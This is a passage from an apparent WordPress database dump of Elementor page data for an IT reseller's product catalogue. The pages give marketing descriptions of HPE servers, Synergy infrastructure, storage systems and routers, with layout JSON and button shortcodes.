overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8625,3657,'_elementor_edit_mode','builder'),(8626,3657,'_elementor_template_type','wp-page'),(8402,3633,'_wp_page_template','template-fullwidth.php'),(8403,3633,'_elementor_edit_mode','builder'),(8404,3633,'_elementor_template_type','post'),(8405,3633,'_elementor_version','2.5.14'),(8406,3633,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5d09ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea019d6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"50f056f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ba1eaa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"736e3d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"bf473fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba9d094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f64c755\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e4020c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4e09160\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f98d0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"8d4989d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11168cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f816ee3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cef774\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85f9784\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea7fd08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bb3eeba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>NETWORKING<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"021e064\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3645aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"d34cd1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Router<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"304f150\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c7392b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"687ac33\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form 